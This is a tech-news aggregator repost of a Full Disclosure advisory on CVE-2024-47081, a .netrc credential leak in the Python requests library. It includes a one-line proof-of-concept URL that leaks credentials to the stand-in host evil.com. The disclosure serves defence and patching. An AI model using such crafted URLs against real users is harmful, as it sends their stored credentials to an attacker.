Techly NewsGet the app

Get the latest tech news

CVE-2024-47081: Netrc credential leak in PSF requests library


Disclosure mailing list archives CVE-2024-47081: Netrc credential leak in PSF requests library From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org> Date: Sat, 31 May 2025 06:30:50 +0000 The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evil.com/') Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org> Date: Sat, 31 May 2025 06:30:50 +0000 By Thread CVE-2024-47081: Netrc credential leak in PSF requests library Juho Forsén via Fulldisclosure (Jun 03)

Get the Android app

Or read this on Hacker News

Read more on:

Photo of credential leak

credential leak

Photo of PSF requests library

PSF requests library

Photo of Netrc

Netrc

Related news:

News photo

How worried should we be about the “AutoSpill” credential leak in Android password managers? | This newly discovered vulnerability is real, but it's more nuanced than that

« Show HN: AirAP AirPlay server – AirPlay to an iOS Device
Where in the world are babies at the lowest risk of dying? »